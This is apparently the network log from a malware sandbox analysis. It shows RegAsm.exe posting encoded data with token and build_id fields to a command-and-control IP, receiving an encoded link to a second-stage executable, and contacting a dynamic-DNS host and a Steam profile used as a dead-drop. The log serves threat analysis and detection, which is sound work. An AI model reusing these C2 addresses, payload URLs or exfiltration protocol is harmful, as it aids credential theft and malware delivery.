                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------BGHJJDGHCBGDHIECBGIDCont
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC16355OUTData Raw: 56 50 63 48 33 46 66 50 53 70 78 69 6d 2b 56 32 76 61 39 2f 38 41 67 48 31 73 61 6b 70 57 58 4d 72 32 76 61 33 2f 41 41 54 49 62 55 72 65 38 76 72 69 33 73 62 72 53 72 77 58 4c 5a 45 66 32 31 64 7a 59 51 41 6a 61 41 63 2f 64 4a 72 7a 6e 78 42 59 66 32 62 72 4d 31 74 35 61 78 37 63 4e 73 56 39 77 47 52 6e 67 34 48 72 36 56 36 74 71 68 42 76 39 45 49 4f 51 62 78 73 66 2b 41 38 31 65 63 65 4f 50 38 41 6b 62 4c 76 2f 64 6a 2f 41 50 51 42 58 66 6c 62 35 63 51 75 58 5a 70 6e 6b 35 30 75 62 43 74 79 33 54 52 7a 6c 48 46 4c 53 63 56 39 4c 63 2b 51 43 69 69 69 67 43 2f 34 58 31 33 54 64 4e 38 53 57 6c 33 64 33 50 6c 77 52 37 39 7a 62 47 62 47 55 59 44 67 44 50 55 69 76 53 50 2b 46 6a 65 45 2f 77 44 6f 4b 2f 38 41 6b 76 4c 2f 41 50 45 31 34 64 70 69 32 4c 36 6e 62
                                                                                                                                                                                                                                        Data Ascii: VPcH3FfPSpxim+V2va9/8AgH1sakpWXMr2va3/AATIbUre8vri3sbrSrwXLZEf21dzYQAjaAc/dJrznxBYf2brM1t5ax7cNsV9wGRng4Hr6V6tqhBv9EIOQbxsf+A81eceOP8AkbLv/dj/APQBXflb5cQuXZpnk50ubCty3TRzlHFLScV9Lc+QCiiigC/4X13TdN8SWl3d3PlwR79zbGbGUYDgDPUivSP+FjeE/wDoK/8AkvL/APE14dpi2L6nb
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC16355OUTData Raw: 6c 46 4d 56 6b 50 2f 41 48 62 64 56 78 37 69 6d 2b 53 44 39 31 2f 77 4e 4a 52 52 5a 44 31 47 4e 45 36 39 52 54 4b 73 42 79 4f 39 4b 58 44 66 65 55 47 6c 59 66 4d 79 74 52 55 35 6a 6a 62 6f 53 50 72 54 47 67 66 2b 48 35 68 37 55 72 46 4b 53 49 7a 53 48 70 53 6b 45 64 52 69 6a 6d 67 61 47 30 55 74 49 61 42 69 55 55 74 46 4d 59 6c 4a 53 30 55 42 63 53 6b 70 61 4b 42 6a 65 61 58 6d 69 67 30 44 45 4e 4a 53 30 6c 41 30 47 4b 53 6c 6f 4e 4d 42 43 4b 62 54 71 4d 55 44 47 69 67 30 76 46 4a 51 4d 51 30 6e 61 6e 55 6d 4b 51 78 75 4b 54 38 4b 63 52 53 64 36 64 68 69 45 63 55 6e 2b 65 6c 4c 69 6c 4e 46 68 6f 59 52 69 6b 70 39 4e 6f 47 49 65 61 44 53 30 6d 4f 39 49 59 30 6a 38 61 51 30 38 34 36 64 36 53 6b 4d 5a 6a 6d 6a 74 2b 4e 4f 78 78 54 63 63 2b 6d 4b 64 68 69 48
                                                                                                                                                                                                                                        Data Ascii: lFMVkP/AHbdVx7im+SD91/wNJRRZD1GNE69RTKsByO9KXDfeUGlYfMytRU5jjboSPrTGgf+H5h7UrFKSIzSHpSkEdRijmgaG0UtIaBiUUtFMYlJS0UBcSkpaKBjeaXmig0DENJS0lA0GKSloNMBCKbTqMUDGig0vFJQMQ0nanUmKQxuKT8KcRSd6dhiEcUn+elLilNFhoYRikp9NoGIeaDS0mO9IY0j8aQ0846d6SkMZjmjt+NOxxTcc+mKdhiH
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC16355OUTData Raw: 6f 70 4b 41 43 69 69 69 6d 4d 4d 30 74 4a 52 51 49 57 69 6a 4e 46 41 42 30 6f 6f 6f 7a 54 47 42 6f 6f 70 44 51 41 74 46 4a 53 30 41 46 46 46 47 61 41 46 48 4e 46 49 4b 58 4e 41 42 51 61 4b 4b 51 42 52 53 55 74 41 68 61 54 46 48 30 70 54 53 41 54 42 70 63 63 55 55 55 77 41 44 32 6f 78 52 52 53 41 54 47 61 4e 75 4b 64 53 30 58 59 44 63 55 68 48 53 6e 59 34 6f 41 7a 78 53 75 46 78 6d 50 51 30 68 54 49 36 66 6a 56 68 4c 65 5a 2f 75 77 79 48 36 4b 61 73 70 70 46 34 34 2f 77 42 54 74 2f 33 6d 41 71 58 56 69 74 32 48 4e 59 79 7a 46 36 47 6f 7a 45 66 53 74 34 61 4a 4d 42 2b 38 75 49 55 2b 72 55 38 61 52 61 70 2f 72 4c 77 6e 2f 63 57 6c 39 61 67 75 6f 2f 61 32 4f 61 61 4d 6d 6d 46 53 50 70 58 57 72 70 32 6c 71 66 6d 45 30 6e 34 34 71 33 62 32 47 6d 7a 52 58 4b 4a
                                                                                                                                                                                                                                        Data Ascii: opKACiiimMM0tJRQIWijNFAB0ooozTGBoopDQAtFJS0AFFFGaAFHNFIKXNABQaKKQBRSUtAhaTFH0pTSATBpccUUUwAD2oxRRSATGaNuKdS0XYDcUhHSnY4oAzxSuFxmPQ0hTI6fjVhLeZ/uwyH6KasppF44/wBTt/3mAqXVit2HNYyzF6GozEfSt4aJMB+8uIU+rU8aRap/rLwn/cWl9aguo/a2OaaMmmFSPpXWrp2lqfmE0n44q3b2GmzRXKJ
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC16355OUTData Raw: 30 68 70 44 51 68 70 50 72 53 6b 48 50 72 36 55 6e 53 6b 55 4a 6a 31 36 55 64 71 50 77 6f 50 51 30 44 52 36 42 52 52 69 69 73 44 35 4d 55 41 73 51 41 43 53 65 41 42 58 53 36 52 70 4e 38 6a 32 30 72 77 46 56 57 51 4d 63 39 63 5a 7a 55 6e 67 76 53 6f 37 79 36 65 35 6c 55 4d 49 6a 68 51 66 58 31 72 76 54 4d 71 4d 59 34 59 46 64 56 4f 33 4a 63 4b 57 49 36 68 52 33 78 2b 46 66 50 5a 74 69 6c 4a 2b 78 58 51 2b 77 34 66 77 44 70 78 2b 74 53 66 78 4b 79 58 6c 66 2f 67 46 74 4a 6b 6c 47 35 58 44 4c 37 47 6f 37 35 2f 38 41 51 4c 6a 2f 41 4b 35 4e 2f 4b 71 6b 68 52 46 53 37 67 79 46 59 44 49 78 6a 49 39 2f 65 71 2b 6f 33 71 72 70 74 30 63 39 49 58 50 36 47 76 46 50 70 54 7a 43 36 65 37 65 7a 67 2b 32 65 5a 35 6f 6b 6c 78 35 69 62 54 74 33 66 4c 32 48 47 4d 59 50 65
                                                                                                                                                                                                                                        Data Ascii: 0hpDQhpPrSkHPr6UnSkUJj16UdqPwoPQ0DR6BRRiisD5MUAsQACSeABXS6RpN8j20rwFVWQMc9cZzUngvSo7y6e5lUMIjhQfX1rvTMqMY4YFdVO3JcKWI6hR3x+FfPZtilJ+xXQ+w4fwDpx+tSfxKyXlf/gFtJklG5XDL7Go75/8AQLj/AK5N/KqkhRFS7gyFYDIxjI9/eq+o3qrpt0c9IXP6GvFPpTzC6e7ezg+2eZ5oklx5ibTt3fL2HGMYPe
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC16355OUTData Raw: 55 5a 57 33 2f 72 38 62 6f 50 37 43 78 53 63 6f 58 30 56 76 6e 2f 41 4d 4e 5a 2f 63 53 30 56 6d 77 61 72 4a 4a 4e 71 63 72 61 6c 34 66 62 79 4c 43 57 53 4b 34 46 67 52 44 43 33 6e 52 71 4e 36 47 41 45 6e 42 49 7a 74 62 72 54 30 76 78 4a 72 56 39 44 49 6b 63 48 6b 42 49 33 43 68 56 52 35 41 67 44 75 67 48 41 52 6a 6c 6c 78 32 49 36 64 4b 75 68 6d 4d 4b 31 52 51 74 61 36 75 5a 59 76 4a 71 6d 48 70 53 71 75 56 37 4f 78 66 6f 70 71 79 49 2f 77 42 78 31 62 36 48 4e 52 76 4d 49 72 32 49 4d 69 4f 68 67 75 57 49 63 5a 47 56 67 64 6c 2f 55 43 75 79 74 56 56 4b 6e 4b 6f 39 6b 72 6e 6d 34 65 68 4b 76 57 6a 53 57 6a 62 73 54 55 56 68 36 58 71 48 6e 36 56 70 73 73 73 53 79 75 31 78 65 79 47 4d 48 44 54 69 47 33 57 52 59 38 39 63 46 75 4f 50 55 34 35 71 58 54 64 56 75
                                                                                                                                                                                                                                        Data Ascii: UZW3/r8boP7CxScoX0Vvn/AMNZ/cS0VmwarJJNqcral4fbyLCWSK4FgRDC3nRqN6GAEnBIztbrT0vxJrV9DIkcHkBI3ChVR5AgDugHARjllx2I6dKuhmMK1RQta6uZYvJqmHpSquV7OxfopqyI/wBx1b6HNRvMIr2IMiOhguWIcZGVgdl/UCuytVVKnKo9krnm4ehKvWjSWjbsTUVh6XqHn6VpsssSyu1xeyGMHDTiG3WRY89cFuOPU45qXTdVu
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC16355OUTData Raw: 44 7a 51 61 58 6f 4b 51 78 4b 51 6d 6c 39 36 54 4e 42 53 44 31 70 4d 35 70 61 51 38 30 41 48 53 6b 4f 50 54 76 53 30 68 50 36 55 44 45 7a 51 52 52 53 5a 70 6a 51 5a 70 41 4b 58 39 4b 53 6b 4d 42 6a 48 74 53 5a 70 54 30 70 4d 30 44 41 63 44 32 70 50 65 6c 35 70 4d 2f 35 4e 4d 41 36 2f 54 33 70 44 6e 48 53 6c 50 58 72 53 45 30 68 69 66 57 69 6c 36 30 6e 58 74 54 47 49 65 74 48 54 70 78 39 4b 58 36 55 6e 66 2f 43 67 5a 36 4a 52 52 52 57 5a 38 69 46 46 61 4f 6a 61 53 32 73 58 63 6c 75 73 6f 6a 4b 52 6d 54 4a 58 4f 63 45 44 48 58 33 72 55 2f 34 52 49 68 69 72 58 68 42 48 55 47 4c 2f 41 4f 76 58 6d 34 72 4e 73 48 68 4a 2b 7a 72 54 73 2f 52 76 38 6b 65 6c 68 63 6f 78 75 4c 70 2b 30 6f 77 75 76 56 4c 38 32 63 31 52 58 55 44 77 66 6e 2f 6c 2f 77 44 2f 41 43 44 2f
                                                                                                                                                                                                                                        Data Ascii: DzQaXoKQxKQml96TNBSD1pM5paQ80AHSkOPTvS0hP6UDEzQRRSZpjQZpAKX9KSkMBjHtSZpT0pM0DAcD2pPel5pM/5NMA6/T3pDnHSlPXrSE0hifWil60nXtTGIetHTpx9KX6Unf/CgZ6JRRRWZ8iFFaOjaS2sXclusojKRmTJXOcEDHX3rU/4RIhirXhBHUGL/AOvXm4rNsHhJ+zrTs/Rv8kelhcoxuLp+0owuvVL82c1RXUDwfn/l/wD/ACD/
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC16355OUTData Raw: 55 65 30 68 33 51 65 78 71 2f 79 76 37 68 31 46 50 6a 68 6e 6d 73 2f 74 6b 56 72 63 76 61 38 2f 76 31 67 63 78 38 48 42 2b 62 47 4f 76 46 4d 37 55 34 79 6a 4c 5a 6b 79 70 7a 68 38 53 73 4c 52 54 53 64 71 65 59 77 49 6a 33 62 4e 2b 44 74 33 59 7a 6a 50 54 4f 4f 31 54 6d 30 76 42 41 6b 2f 32 47 37 38 6c 77 43 73 76 32 64 39 72 41 39 4d 48 47 44 53 64 53 4b 33 59 34 30 71 6b 76 68 69 33 38 6a 75 37 48 78 76 70 64 74 70 39 74 62 76 46 64 6c 34 6f 55 52 69 71 4c 6a 49 41 48 48 7a 56 50 38 41 38 4a 39 70 50 2f 50 47 39 2f 37 39 72 2f 38 41 46 56 35 70 35 71 65 57 73 6d 54 35 62 4e 74 56 39 70 77 57 34 34 7a 36 38 6a 6a 33 70 35 79 6f 6c 4a 56 78 35 4a 32 79 35 55 2f 75 7a 6e 47 47 39 4f 65 4f 61 38 76 2b 79 73 4e 2f 4d 2f 76 58 2b 52 37 2f 41 50 62 2b 4e 2f 6b
                                                                                                                                                                                                                                        Data Ascii: Ue0h3Qexq/yv7h1FPjhnms/tkVrcva8/v1gcx8HB+bGOvFM7U4yjLZkypzh8SsLRTSdqeYwIj3bN+Dt3YzjPTOO1Tm0vBAk/2G78lwCsv2d9rA9MHGDSdSK3Y40qkvhi38ju7Hxvpdtp9tbvFdl4oURiqLjIAHHzVP8A8J9pP/PG9/79r/8AFV5p5qeWsmT5bNtV9pwW44z68jj3p5yolJVx5J2y5U/uznGG9OeOa8v+ysN/M/vX+R7/APb+N/k
                                                                                                                                                                                                                                        2024-09-21 12:49:25 UTC61OUTData Raw: 2f 41 45 47 4f 71 64 58 4a 50 2b 51 4c 61 2f 38 41 58 78 4e 2f 36 44 48 51 42 2f 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: /AEGOqdXJP+QLa/8AXxN/6DHQB//Z------BGHJJDGHCBGDHIECBGID--
                                                                                                                                                                                                                                        2024-09-21 12:49:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:26 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        30192.168.2.949775116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:28 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BAEHIEBGHDAFIEBGIEHJ
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------BAEHIEBGHDAFIEBGIEHJCont
                                                                                                                                                                                                                                        2024-09-21 12:49:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:28 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:28 UTC103INData Raw: 35 63 0d 0a 4d 54 45 34 4d 44 59 78 4e 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 57 4e 69 4e 44 55 30 5a 44 4a 69 4e 47 46 66 62 47 64 6d 5a 48 4e 71 5a 32 52 7a 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 5cMTE4MDYxNnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZWNiNDU0ZDJiNGFfbGdmZHNqZ2RzLmV4ZXwxfGtra2t80


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        31192.168.2.949777116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:33 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDG
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:33 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------BFIJEHCBAKFCAKFHCGDGCont
                                                                                                                                                                                                                                        2024-09-21 12:49:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:34 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        32192.168.2.949780116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:36 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CFBAKEHIEBKJJJJJKKKE
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------CFBAKEHIEBKJJJJJKKKECont
                                                                                                                                                                                                                                        2024-09-21 12:49:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:37 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        33192.168.2.94978645.132.206.2514437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:41 UTC188OUTGET / HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Host: cowod.hopto.org
                                                                                                                                                                                                                                        2024-09-21 12:49:41 UTC183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:41 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        X-Served-By: cowod.hopto.org


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        34192.168.2.94978923.197.127.214431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:43 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:44 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:44 GMT
                                                                                                                                                                                                                                        Content-Length: 34740
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: sessionid=080ec9ec65033f7fcde8d2ff; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                        2024-09-21 12:49:44 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
